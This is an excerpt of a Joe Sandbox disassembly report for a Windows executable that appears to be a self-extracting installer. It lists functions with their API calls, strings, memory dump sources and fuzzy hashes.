cscapi.dll, xrefs: 00007FF731C8E1AB
dsrole.dll, xrefs: 00007FF731C8E2FB
version.dll, xrefs: 00007FF731C8DFF7
cabinet.dll, xrefs: 00007FF731C8E157
dnsapi.DLL, xrefs: 00007FF731C8E1D5
netapi32.dll, xrefs: 00007FF731C8E0E7
ieframe.dll, xrefs: 00007FF731C8E09C
apphelp.dll, xrefs: 00007FF731C8E0CB
ws2help.dll, xrefs: 00007FF731C8E086
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00007FF731C8E6B7
devrtl.dll, xrefs: 00007FF731C8E21B
WindowsCodecs.dll, xrefs: 00007FF731C8E18F
samlib.dll, xrefs: 00007FF731C8E253
sfc_os.dll, xrefs: 00007FF731C8E00D
rasadhlp.dll, xrefs: 00007FF731C8E28B
clbcatq.dll, xrefs: 00007FF731C8E065
linkinfo.dll, xrefs: 00007FF731C8E2C3
netutils.dll, xrefs: 00007FF731C8E1FF
cryptbase.dll, xrefs: 00007FF731C8E044
wkscli.dll, xrefs: 00007FF731C8E261
secur32.dll, xrefs: 00007FF731C8E149
browcli.dll, xrefs: 00007FF731C8E27D

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
API String ID: 1496594111-2013832382
Opcode ID: 6c35d85a0d7de7c2ad60728f7b3f183caddfc68bafefe393af7a58770600f1ff
Instruction ID: b6dc659588824cbb6aebdf6018a68e141a3995b285aad9dde74ab8d5bc3b9783
Opcode Fuzzy Hash: 6c35d85a0d7de7c2ad60728f7b3f183caddfc68bafefe393af7a58770600f1ff
Instruction Fuzzy Hash: 0D324C31E09B82A9EB11EF64E8801E9B3A4FF45354FA04236DA4D47B65EFBCD254D360

Function 00007FF731C8989C Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C88E18: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731C88F4D

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF731C89F35
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8A3EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8A3F5

Part of subcall function 00007FF731C90B3C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF731C90AC4), ref: 00007FF731C90B69

Strings

@%s:, xrefs: 00007FF731C89F17
$%s:, xrefs: 00007FF731C89F10
DIALOG, xrefs: 00007FF731C89D8D
RTL, xrefs: 00007FF731C89EEE
,, xrefs: 00007FF731C89F6A
*messages***, xrefs: 00007FF731C89BC4
DIRECTION, xrefs: 00007FF731C89DA5
MENU, xrefs: 00007FF731C89D99
, xrefs: 00007FF731C89DB9
STRINGS, xrefs: 00007FF731C89D81
*messages***, xrefs: 00007FF731C89B86

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
API String ID: 3629253777-3268106645
Opcode ID: 0fc393143a5d3e461d409afd558c662721dc80b2309836bcf9d462a656cf5c07
Instruction ID: 1357228eb527351b08f5e40cb3691b5ac44f55d0a7fb297adb0e2015920f90ee
Opcode Fuzzy Hash: 0fc393143a5d3e461d409afd558c662721dc80b2309836bcf9d462a656cf5c07
Instruction Fuzzy Hash: F262E222E19A82A5EB20EF64C4842BDE361FB44784FE05131DA4E47AD5EFBCE545E360

Function 00007FF731CA1880 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF731CA14D8: DloadProtectSection.DELAYIMP ref: 00007FF731CA1549

RaiseException.KERNEL32 ref: 00007FF731CA1927
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF731CA1913

Part of subcall function 00007FF731CA17E8: DloadProtectSection.DELAYIMP ref: 00007FF731CA1847

LoadLibraryExA.KERNELBASE ref: 00007FF731CA19C6
GetLastError.KERNEL32 ref: 00007FF731CA19D4
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF731CA1A06
RaiseException.KERNEL32 ref: 00007FF731CA1A1A

Strings

H, xrefs: 00007FF731CA18F4

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
String ID: H
API String ID: 3432403771-2852464175
Opcode ID: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
Instruction ID: 781ccf2933909eda91fa10e2e1f409a3a8d66f6595ef09fcbcb8e6cdb2aff4eb
Opcode Fuzzy Hash: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
Instruction Fuzzy Hash: 69916E22E05B52AAEB01EF65E8406BCB3B5FB08B54FA44835DE0D17B54EFB8E445D320

Function 00007FF731C9F460 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32 ref: 00007FF731C9F6C7
ShowWindow.USER32 ref: 00007FF731C9F706
GetExitCodeProcess.KERNEL32 ref: 00007FF731C9F73D
CloseHandle.KERNEL32 ref: 00007FF731C9F767
ShowWindow.USER32 ref: 00007FF731C9F7BF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9F87B

Strings

p, xrefs: 00007FF731C9F4A9
.exe, xrefs: 00007FF731C9F772
Install, xrefs: 00007FF731C9F604
.inf, xrefs: 00007FF731C9F5F5

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
String ID: .exe$.inf$Install$p
API String ID: 1054546013-3607691742
Opcode ID: dd439fb9acd67611f37c1c3899ae494ad4728dfc081353623276918ed5a43e30
Instruction ID: 7c4e6b285985350e90e47af2432b292f0a28b79643eb7e73d77381e83743eacb
Opcode Fuzzy Hash: dd439fb9acd67611f37c1c3899ae494ad4728dfc081353623276918ed5a43e30
Instruction Fuzzy Hash: 70C19062F18702A5FB10EB25D94427DA7B1BF85B84FA44031CA4D47BA5EFBCE851E320

Function 00007FF731C9F024 Relevance: 16.6, APIs: 11, Instructions: 102
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF731C9AD9C: PeekMessageW.USER32 ref: 00007FF731C9ADB2
Part of subcall function 00007FF731C9AD9C: GetMessageW.USER32 ref: 00007FF731C9ADC9
Part of subcall function 00007FF731C9AD9C: IsDialogMessageW.USER32 ref: 00007FF731C9ADE0
Part of subcall function 00007FF731C9AD9C: TranslateMessage.USER32 ref: 00007FF731C9ADEF
Part of subcall function 00007FF731C9AD9C: DispatchMessageW.USER32 ref: 00007FF731C9ADFA

GetDlgItem.USER32 ref: 00007FF731C9F063
ShowWindow.USER32 ref: 00007FF731C9F089
SendMessageW.USER32 ref: 00007FF731C9F09E
SendMessageW.USER32 ref: 00007FF731C9F0B6
SendMessageW.USER32 ref: 00007FF731C9F0D7
SendMessageW.USER32 ref: 00007FF731C9F0F3
SendMessageW.USER32 ref: 00007FF731C9F136
SendMessageW.USER32 ref: 00007FF731C9F154
SendMessageW.USER32 ref: 00007FF731C9F168
SendMessageW.USER32 ref: 00007FF731C9F192
SendMessageW.USER32 ref: 00007FF731C9F1AA

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID:
API String ID: 3569833718-0
Opcode ID: 7d379054cb94ea220feff0600702c1a3525b366c45d8dc990373b330b6eb2c2b
Instruction ID: e1516681b4685e4541ed2cc8172332fcff68761ab66cce80842f41a40bb9e611
Opcode Fuzzy Hash: 7d379054cb94ea220feff0600702c1a3525b366c45d8dc990373b330b6eb2c2b
Instruction Fuzzy Hash: 12411172F146429AF700EF61E800BAA6360EB89F98FA01036DD0A07B94CFBDE4459764

Function 00007FF731C7EF20 Relevance: 11.0, APIs: 7, Instructions: 453COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7F552
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7F558
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7F564
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7F56A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7F570
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7F57C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7F582

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 272c4e36407371497009dfbdd07fcc185cf89d238bb2a2f1ba082823b8577246
Instruction ID: 0f37cec90e8c915279a079a0f67eee0bda06ea15a69126b8b1bffbee7f50d9f7
Opcode Fuzzy Hash: 272c4e36407371497009dfbdd07fcc185cf89d238bb2a2f1ba082823b8577246
Instruction Fuzzy Hash: 3A12E562F08741A9FB10EB65D4842ACA371EB457A8FA00232DE6C17AD9DFFCD546D350

Function 00007FF731C82480 Relevance: 9.2, APIs: 6, Instructions: 164
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF731C8255B
GetLastError.KERNEL32 ref: 00007FF731C8256E
CreateFileW.KERNEL32 ref: 00007FF731C825CE
GetLastError.KERNEL32 ref: 00007FF731C825D7
SetFileTime.KERNEL32 ref: 00007FF731C82689
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C826F6

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3536497005-0
Opcode ID: 96e9081ff4bc34e56434afd79359cf8921b737578e2ea268c4aacff097592dd7
Instruction ID: d2afd0ef3f141fc99c0fe67883ff5b6be0b39c29086e71a99a1197ca15df691d
Opcode Fuzzy Hash: 96e9081ff4bc34e56434afd79359cf8921b737578e2ea268c4aacff097592dd7
Instruction Fuzzy Hash: 1061E162E0868196E7209B29E44436EA7B1FB887ACF601324DEAD03AD8CF7DD055D750

Function 00007FF731C9AF94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadBitmapW.USER32 ref: 00007FF731C9AFAA
GetObjectW.GDI32 ref: 00007FF731C9AFDB
DeleteObject.GDI32 ref: 00007FF731C9B015
DeleteObject.GDI32 ref: 00007FF731C9B045

Part of subcall function 00007FF731C985A4: FindResourceW.KERNEL32 ref: 00007FF731C985BD
Part of subcall function 00007FF731C985A4: SizeofResource.KERNEL32 ref: 00007FF731C985D9
Part of subcall function 00007FF731C985A4: LoadResource.KERNEL32 ref: 00007FF731C985F3
Part of subcall function 00007FF731C985A4: LockResource.KERNEL32 ref: 00007FF731C98605
Part of subcall function 00007FF731C985A4: GlobalAlloc.KERNELBASE ref: 00007FF731C98626
Part of subcall function 00007FF731C985A4: GlobalLock.KERNEL32 ref: 00007FF731C9863B
Part of subcall function 00007FF731C985A4: CreateStreamOnHGlobal.COMBASE ref: 00007FF731C98668
Part of subcall function 00007FF731C985A4: GdipAlloc.GDIPLUS ref: 00007FF731C9867E
Part of subcall function 00007FF731C985A4: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF731C986E9
Part of subcall function 00007FF731C985A4: GlobalUnlock.KERNEL32 ref: 00007FF731C9870C
Part of subcall function 00007FF731C985A4: GlobalFree.KERNEL32 ref: 00007FF731C98715

Strings

], xrefs: 00007FF731C9AFE3

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
String ID: ]
API String ID: 3561356813-3352871620
Opcode ID: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
Instruction ID: 4d55840b32b008fdc48921cf9be9eb4864b16fdb8425cc28f53ad6c4d9179fec
Opcode Fuzzy Hash: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
Instruction Fuzzy Hash: 48118621F0964661FB54BB11965437DD391AF88BC0FA80034D95D07B9AFEBCE914A720

Function 00007FF731C9AD9C Relevance: 7.5, APIs: 5, Instructions: 27
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32 ref: 00007FF731C9ADB2
GetMessageW.USER32 ref: 00007FF731C9ADC9
IsDialogMessageW.USER32 ref: 00007FF731C9ADE0
TranslateMessage.USER32 ref: 00007FF731C9ADEF
DispatchMessageW.USER32 ref: 00007FF731C9ADFA

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
Instruction ID: c3a276f70f03f9036ad92b1ff6092563ac526942ebbeb49c1185af9ff57554e6
Opcode Fuzzy Hash: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
Instruction Fuzzy Hash: DAF0FF37F38552A2FB50AB71E895AB6A361FFD0B05FE06031E54E41854DF6CD518DB20

Function 00007FF731C99168 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32 ref: 00007FF731C99191
SHAutoComplete.SHLWAPI ref: 00007FF731C991D5

Part of subcall function 00007FF731C91344: CompareStringW.KERNEL32 ref: 00007FF731C91363

FindWindowExW.USER32 ref: 00007FF731C991BF

Strings

EDIT, xrefs: 00007FF731C9919B, 00007FF731C991B3

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
Instruction ID: 47a7853e175a7a9c21ca046134ce262c282c8f16d481427ed8423d5d9680f431
Opcode Fuzzy Hash: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
Instruction Fuzzy Hash: B5018662F08A47A1FB20AB61F8143F6D390BF58740FD41035CD4E46655EEBCD149E620

Function 00007FF731C82CA0 Relevance: 6.1, APIs: 4, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(00007FF731C88C5A), ref: 00007FF731C82CE2
WriteFile.KERNEL32 ref: 00007FF731C82D2C
WriteFile.KERNELBASE ref: 00007FF731C82D5A

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 0e2e947f5374c0ddd2130b56bb75e1f08e0d4936f885f01de5306a6f3d1a31f8
Instruction ID: f036d0b39bb0d2242793addd346991a262adfcc737c1a0be427bd7b225889f81
Opcode Fuzzy Hash: 0e2e947f5374c0ddd2130b56bb75e1f08e0d4936f885f01de5306a6f3d1a31f8
Instruction Fuzzy Hash: 9B510922F1964262FB10EB24D48877AA350FF48B91FA04132EA4E47AD4DFFCE985D710

Function 00007FF731CA0360 Relevance: 6.1, APIs: 4, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowTextW.USER32 ref: 00007FF731CA04D6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731CA0541
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731CA0547
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731CA054D

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$TextWindow
String ID:
API String ID: 2912839123-0
Opcode ID: 7facb3930930602f0996268801a3c9d730c143456cf898398e6b94e3bd65bcf3
Instruction ID: a5a62f75f5fbd8061353f9300ee084b1906e6be9b725566c5b05232678f03aa0
Opcode Fuzzy Hash: 7facb3930930602f0996268801a3c9d730c143456cf898398e6b94e3bd65bcf3
Instruction Fuzzy Hash: 8C51A162F14752A4FF01ABA4D8452ADA322BB44BE4FA00A36DA5C17BD5DEACD450D360

Function 00007FF731CA2CEC Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF731CA2CFB

Part of subcall function 00007FF731CA277C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF731CA279E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF731CA2D10
__scrt_release_startup_lock.LIBCMT ref: 00007FF731CA2D7E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF731CA2DD1

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
